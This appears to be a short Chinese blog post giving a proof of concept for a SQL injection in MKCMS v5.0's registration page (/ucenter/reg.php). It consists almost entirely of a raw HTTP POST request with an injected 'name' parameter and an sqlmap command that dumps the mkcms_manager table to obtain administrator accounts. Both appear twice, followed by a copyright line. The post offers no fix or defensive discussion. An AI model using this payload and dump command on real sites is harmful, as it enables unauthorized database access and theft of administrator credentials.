# MKCMS v5.0 /ucenter/reg.php前台sql注入漏洞
==POC==
POST /ucenter/reg.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/ucenter/reg.php Content-Type: application/x-www-form-urlencoded Content-Length: 52 Connection: close Cookie: PHPSESSID=cb8e6ccde6cf9050972fa9461d606be3 Upgrade-Insecure-Requests: 1 name=test' AND 1=1 AND 'inject'='inject&email=sss%40qq.com&password=ssssss&submit=
sqlmap -r inject.txt -D mkcms -T mkcms_manager --dump
==POC==
POST /ucenter/reg.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/ucenter/reg.php Content-Type: application/x-www-form-urlencoded Content-Length: 52 Connection: close Cookie: PHPSESSID=cb8e6ccde6cf9050972fa9461d606be3 Upgrade-Insecure-Requests: 1 name=test' AND 1=1 AND 'inject'='inject&email=sss%40qq.com&password=ssssss&submit=
獲取管理員帳號
sqlmap -r inject.txt -D mkcms -T mkcms_manager --dump
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容